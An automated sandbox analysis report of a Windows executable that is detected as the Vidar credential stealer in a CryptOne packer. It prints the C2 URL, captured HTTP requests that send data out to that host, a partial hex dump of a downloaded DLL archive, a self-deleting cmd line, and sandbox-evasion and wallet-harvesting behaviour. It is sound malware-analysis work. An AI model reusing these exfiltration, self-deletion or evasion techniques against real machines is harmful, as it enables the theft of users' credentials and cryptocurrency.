Windows Analysis Report
b123.exe

Overview

General Information

Sample Name: b123.exe
Analysis ID: 594632
MD5: 2e89a7aae558e9be86042e2bd7e65803
SHA1: 64e85269651f0a475d0a94eb98cd3adbf3061e10
SHA256: 7022a16d455a3ad78d0bbeeb2793cb35e48822c3a0a8d9eaa326ffc91dd9e625
Tags: exeMarsStealerMarsStealer
Infos:

Detection

CryptOne Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Detected unpacking (overwrites its own PE header)
Yara detected CryptOne packer
Yara detected Vidar stealer
Detected CryptOne packer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Detected unpacking (creates a PE file in dynamic memory)
Found evasive API chain (may stop execution after checking mutex)
Tries to steal Crypto Currency Wallets
Machine Learning detection for sample
Self deletion via cmd delete
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found evasive API chain (may stop execution after checking locale)
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Del in CommandLine
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Contains functionality to read the PEB
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection
barindex
Found malware configuration
Source: 0.2.b123.exe.20b0000.1.raw.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://sughicent.com/blaka.php"}
Multi AV Scanner detection for submitted file
Source: b123.exe ReversingLabs: Detection: 33%
Antivirus detection for URL or domain
Source: http://sughicent.com/request Avira URL Cloud: Label: malware
Machine Learning detection for sample
Source: b123.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.b123.exe.20b0000.1.unpack Avira: Label: TR/Patched.Ren.Gen
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\b123.exe Code function: 0_2_00408E30 CryptUnprotectData,LocalAlloc,LocalFree, 0_2_00408E30
Source: C:\Users\user\Desktop\b123.exe Code function: 0_2_00405450 memset,CryptStringToBinaryA,CryptStringToBinaryA, 0_2_00405450
Source: C:\Users\user\Desktop\b123.exe Code function: 0_2_004090C0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat, 0_2_004090C0
Source: C:\Users\user\Desktop\b123.exe Code function: 0_2_00408AB0 CryptUnprotectData, 0_2_00408AB0
Source: C:\Users\user\Desktop\b123.exe Code function: 0_2_00408D90 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_00408D90

Compliance
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\b123.exe Unpacked PE file: 0.2.b123.exe.400000.0.unpack
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\Desktop\b123.exe Unpacked PE file: 0.2.b123.exe.60900000.2.unpack
Uses 32bit PE files
Source: b123.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\b123.exe Code function: 0_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00401280
Source: C:\Users\user\Desktop\b123.exe Code function: 0_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00401090
Source: C:\Users\user\Desktop\b123.exe Code function: 0_2_0040A150 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040A150
Source: C:\Users\user\Desktop\b123.exe Code function: 0_2_0040B570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose, 0_2_0040B570
Source: C:\Users\user\Desktop\b123.exe Code function: 0_2_00407620 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00407620
Source: C:\Users\user\Desktop\b123.exe Code function: 0_2_0040B110 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040B110
Source: C:\Users\user\Desktop\b123.exe Code function: 0_2_0040B3A0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040B3A0
Source: C:\Users\user\Desktop\b123.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\b123.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\b123.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\ Jump to behavior
Source: C:\Users\user\Desktop\b123.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\b123.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\b123.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\ Jump to behavior

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://sughicent.com/blaka.php
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-REGRU AS-REGRU
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /blaka.php HTTP/1.1Host: sughicent.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /request HTTP/1.1Host: sughicent.comCache-Control: no-cacheCookie: PHPSESSID=4iac33eqpnj3t9m3k3cj80jcma
Source: global traffic HTTP traffic detected: POST /blaka.php HTTP/1.1Content-Type: multipart/form-data; boundary=----2DJEKNYUK6F3E3EKHost: sughicent.comContent-Length: 93933Connection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=4iac33eqpnj3t9m3k3cj80jcma
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 5.63.155.126 5.63.155.126
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.2Date: Tue, 22 Mar 2022 22:52:03 GMTContent-Type: application/octet-streamContent-Length: 1565849Last-Modified: Mon, 21 Feb 2022 16:34:00 GMTConnection: keep-aliveETag: "6213bef8-17e499"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 0d 7a 3e 54 c5 85 06 76 05 31 01 00 d0 35 02 00 0c 00 00 00 73 6f 66 74 6f 6b 6e 33 2e 64 6c 6c ec 5b 7d 78 14 45 9a ef 9e 99 84 49 98 64 1a 48 30 3c 04 09 6c f0 b2 8a 18 18 58 12 09 18 20 9d 8d 42 60 d8 81 99 04 c8 07 5f 3a 8e 01 42 9c c6 9c 4f 50 d8 c9 28 b3 cd 78 78 8b 0a b7 ec 0a 0a 1e 77 b2 ae ab a0 39 37 a7 e3 05 49 60 05 f9 d2 45 c5 5d 5c 61 af 71 b2 4b 74 73 31 ba 39 fa de aa ea ee 99 ae ee e4 f4 b9 7f 8f e7 c1 aa a9 fe d5 fb fe de 8f 7a ab aa 1b 2b 97 ef 64 ac 0c c3 d8 e0 af 2c 33 4c 1b 43 fe 94 32 df e2 0f cb 30 99 e3 df c8 64 8e a4 9d 9a d0 c6 2e 3c 35 61 a9 ff fe 07 f3 1a 9b 36 de d7 b4 6a 7d de 9a 55 1b 36 6c 0c e6 ad 5e 97 d7 24 6c c8 bb 7f 43 5e d9 62 4f de fa 8d 6b d7 4d c9 c8 48 cf 57 44 3c d7 90 9f fb a7 8c 7b 16 ab 7f af 0b 1f 2e fe 1c da bb 36 2e 58 74 05 b7 77 2b ed e2 45 dd b8 5d b4 e8 cf d0 1e 5b 4f 9e df be 61 c1 a2 ab 78 ee 82 c5 8f e0 df 8b 16 7d 89 db 7b 16 fd 27 6e 8f 2e 26 6d 05 fe fd a3 fb d7 f8 91 1e d5 04 37 cf 30 0b d9 14 e6 ad d5 f1 15 ea d8 65 66 e2 84 e1 6c e6 70 e6 35 30 70 35 19 7b a6 1d fa 1c 74 ce b0 e8 27 87 fb 16 86 49 65 f0 6f ad 65 dc 16 ec cc b4 5f 5b e0 71 29 99 c4 31 4c a2 25 0d 67 b5 30 87 a0 6d 83 b6 0b 0d 16 5a 98 66 6b 92 6f 73 2c cc 99 71 28 10 16 a6 3e 13 d4 de 60 99 a5 cc e0 7f 0a 64 56 1f 33 e0 d9 60 19 1c 3f 25 b8 ae 39 08 ed 6f 8f 10 8a d8 56 9b 1e 93 c7 30 f5 53 9a d6 ae 0a ae 62 98 f4 32 c5 f6 72 68 df 60 93 61 48 6f e9 14 02 63 98 61 68 a2 45 91 65 a1 71 b1 29 4d 0f 36 ad 61 18 62 6b a1 82 b3 19 70 a5 53 9a d6 35 6c 5c c3 60 db 91 0f 30 47 bb 01 37 8f f9 ff 3f ff a7 3f cb c4 ee fd 2b 27 5a b8 70 4c 18 29 cd cc 62 98 70 2c 68 73 c5 6a 3a f0 68 8d bc ef 65 56 07 1a 25 8d 24 a0 94 50 97 9c 40 b5 eb 51 99 52 f7 28 84 12 1c 2a 00 a5 59 4d 87 4e d0 89 51 26 82 da 58 8a d3 f3 a3 0c 9c ea 9b 75 72 b6 99 c9 69 65 28 42 2b 08 a1 34 55 46 0b c5 66 96 99 94 ad 20 25 21 22 87 88 18 8e 47 e4 7d 05 40 b5 23 41 f4 9b 91 84 28 08 e8 50 10 3b 2c 14 89 0f 46 ea bd b2 d3 82 bc 12 9a 84 7e 32 fe 77 cf b1 9c 9c 5d 02 ff ad 16 33 aa d0 9c 13 41 07 c0 ed 4b e4 ec 95 68 34 34 09 8d 32 5e df 9b 31 f8 f9 56 3d fc 38 78 f0 60 5d 6d 87 ce 63 9b 46 1a a3 b8 d2 42 45 71 e1 48 13 73 fd 34 df 5b 28 be f5 16 43 14 ad 66 82 d6 d2 82 3e 19 a1 17 e4 b6 1a 04 bd 31 c2 44 50 85 95 e2 bd cb 0c 55 45 a3 36 98 a1 96 5a a9 d4 aa 18 61 4c 2d bf 4e ce 2d 26 72 ea 83 3a cb ac 23 f4 79 d5 40 99 f5 19 67 22 a2 51 07 89 99 41 26 eb 20 3f 37 83 14 e8 20 0f 9b 41 38 1d c4 67 02 d9 77 88 4e 8d a9 66 82 b2 74 90 4c 33 48 8e 0e 12 77 9a e8 ba 40 17 93 77 cc 50 17 69 d4 b3 66 a8 4b 34 ea ef cd 50 a5 74 6a 78 cc 50 25 34 ea 76 33 d4 4a 1a 35 cc 0c d5 45 f3 fa 34 d3 04 75 86 ae 73 bf c9 34 ae da 02 7a 19 3d 9d a9 5f 46 d3 8d eb f1 41 33 6d 03 16 4a 5b
Source: b123.exe String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: b123.exe String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: b123.exe String found in binary or memory: http://ocsp.sectigo.com0
Source: 4OZ5FKFU.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 4OZ5FKFU.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 4OZ5FKFU.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 4OZ5FKFU.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 4OZ5FKFU.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 4OZ5FKFU.0.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 4OZ5FKFU.0.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: b123.exe String found in binary or memory: https://sectigo.com/CPS0D
Source: 4OZ5FKFU.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown HTTP traffic detected: POST /blaka.php HTTP/1.1Content-Type: multipart/form-data; boundary=----2DJEKNYUK6F3E3EKHost: sughicent.comContent-Length: 93933Connection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=4iac33eqpnj3t9m3k3cj80jcma
Source: unknown DNS traffic detected: queries for: sughicent.com
Source: C:\Users\user\Desktop\b123.exe Code function: 0_2_00406040 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 0_2_00406040
Source: global traffic HTTP traffic detected: GET /blaka.php HTTP/1.1Host: sughicent.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /request HTTP/1.1Host: sughicent.comCache-Control: no-cacheCookie: PHPSESSID=4iac33eqpnj3t9m3k3cj80jcma
Uses 32bit PE files
Source: b123.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Detected potential crypto function
Source: C:\Users\user\Desktop\b123.exe Code function: 0_2_0041B020 0_2_0041B020
Source: C:\Users\user\Desktop\b123.exe Code function: 0_2_00410F00 0_2_00410F00
Source: C:\Users\user\Desktop\b123.exe Code function: 0_2_0041A190 0_2_0041A190
Source: C:\Users\user\Desktop\b123.exe Code function: 0_2_0041A790 0_2_0041A790
Source: C:\Users\user\Desktop\b123.exe Code function: 0_2_0041A5A0 0_2_0041A5A0
Source: C:\Users\user\Desktop\b123.exe Code function: 0_2_004107B0 0_2_004107B0
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\b123.exe Code function: String function: 004054F0 appears 580 times
Sample file is different than original file name gathered from version info
Source: b123.exe, 00000000.00000000.426208275.0000000000433000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamejaureg.exe\ vs b123.exe
Source: b123.exe Binary or memory string: OriginalFilenamejaureg.exe\ vs b123.exe
PE file contains strange resources
Source: b123.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: b123.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: b123.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: b123.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: b123.exe ReversingLabs: Detection: 33%
Source: b123.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\b123.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\b123.exe "C:\Users\user\Desktop\b123.exe"
Source: C:\Users\user\Desktop\b123.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\b123.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
Source: C:\Users\user\Desktop\b123.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\b123.exe" & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5 Jump to behavior
Source: C:\Users\user\Desktop\b123.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\b123.exe File created: C:\Users\user\Desktop\GLFUAS2V Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/4@1/1
Source: C:\Users\user\Desktop\b123.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: b123.exe, 00000000.00000002.468140591.000000000F104000.00000004.00000800.00020000.00000000.sdmp, b123.exe, 00000000.00000002.469261812.000000006096F000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: b123.exe, 00000000.00000002.468140591.000000000F104000.00000004.00000800.00020000.00000000.sdmp, b123.exe, 00000000.00000002.469261812.000000006096F000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: b123.exe, 00000000.00000002.468140591.000000000F104000.00000004.00000800.00020000.00000000.sdmp, b123.exe, 00000000.00000002.469261812.000000006096F000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: b123.exe, 00000000.00000002.468140591.000000000F104000.00000004.00000800.00020000.00000000.sdmp, b123.exe, 00000000.00000002.469261812.000000006096F000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: b123.exe, 00000000.00000002.468140591.000000000F104000.00000004.00000800.00020000.00000000.sdmp, b123.exe, 00000000.00000002.469261812.000000006096F000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: b123.exe, 00000000.00000002.468140591.000000000F104000.00000004.00000800.00020000.00000000.sdmp, b123.exe, 00000000.00000002.469261812.000000006096F000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: b123.exe, 00000000.00000002.468140591.000000000F104000.00000004.00000800.00020000.00000000.sdmp, b123.exe, 00000000.00000002.469261812.000000006096F000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: b123.exe, 00000000.00000002.468140591.000000000F104000.00000004.00000800.00020000.00000000.sdmp, b123.exe, 00000000.00000002.469261812.000000006096F000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: b123.exe, 00000000.00000002.468140591.000000000F104000.00000004.00000800.00020000.00000000.sdmp, b123.exe, 00000000.00000002.469261812.000000006096F000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: b123.exe, 00000000.00000002.468140591.000000000F104000.00000004.00000800.00020000.00000000.sdmp, b123.exe, 00000000.00000002.469261812.000000006096F000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: b123.exe, 00000000.00000002.468140591.000000000F104000.00000004.00000800.00020000.00000000.sdmp, b123.exe, 00000000.00000002.469261812.000000006096F000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: b123.exe, 00000000.00000002.468140591.000000000F104000.00000004.00000800.00020000.00000000.sdmp, b123.exe, 00000000.00000002.469261812.000000006096F000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4492:120:WilError_01
Source: C:\Users\user\Desktop\b123.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\b123.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: b123.exe Static PE information: More than 200 imports for USER32.dll

Data Obfuscation
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\b123.exe Unpacked PE file: 0.2.b123.exe.400000.0.unpack
Detected CryptOne packer
Source: C:\Users\user\Desktop\b123.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{AA5B6A80-B834-11D0-932F-00A0C90DCAA9} Jump to behavior
Source: C:\Users\user\Desktop\b123.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{AA5B6A80-B834-11D0-932F-00A0C90DCAA9} Jump to behavior
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\b123.exe Unpacked PE file: 0.2.b123.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\Desktop\b123.exe Unpacked PE file: 0.2.b123.exe.60900000.2.unpack
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\b123.exe Code function: 0_2_00415FC0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress, 0_2_00415FC0
PE file contains an invalid checksum
Source: b123.exe Static PE information: real checksum: 0x3b375 should be: 0x3cf40
Source: initial sample Static PE information: section name: .text entropy: 7.5186416062

Hooking and other Techniques for Hiding and Protection
barindex
Self deletion via cmd delete
Source: C:\Users\user\Desktop\b123.exe Process created: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\b123.exe" & exit
Source: C:\Users\user\Desktop\b123.exe Process created: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\b123.exe" & exit Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\b123.exe Code function: 0_2_00415FC0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress, 0_2_00415FC0
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\b123.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\b123.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\b123.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\b123.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\b123.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\b123.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\b123.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\b123.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\b123.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\b123.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\b123.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\b123.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\b123.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\b123.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Users\user\Desktop\b123.exe Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\Desktop\b123.exe Evasive API call chain: GetPEB, DecisionNodes, Sleep
Source: C:\Users\user\Desktop\b123.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Found evasive API chain (may stop execution after checking locale)
Source: C:\Users\user\Desktop\b123.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\Desktop\b123.exe Code function: 0_2_00408370 0_2_00408370
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Is looking for software installed on the system
Source: C:\Users\user\Desktop\b123.exe Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Users\user\Desktop\b123.exe Code function: 0_2_00408370 0_2_00408370
Source: C:\Users\user\Desktop\b123.exe Code function: 0_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00401280
Source: C:\Users\user\Desktop\b123.exe Code function: 0_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00401090
Source: C:\Users\user\Desktop\b123.exe Code function: 0_2_0040A150 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040A150
Source: C:\Users\user\Desktop\b123.exe Code function: 0_2_0040B570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose, 0_2_0040B570
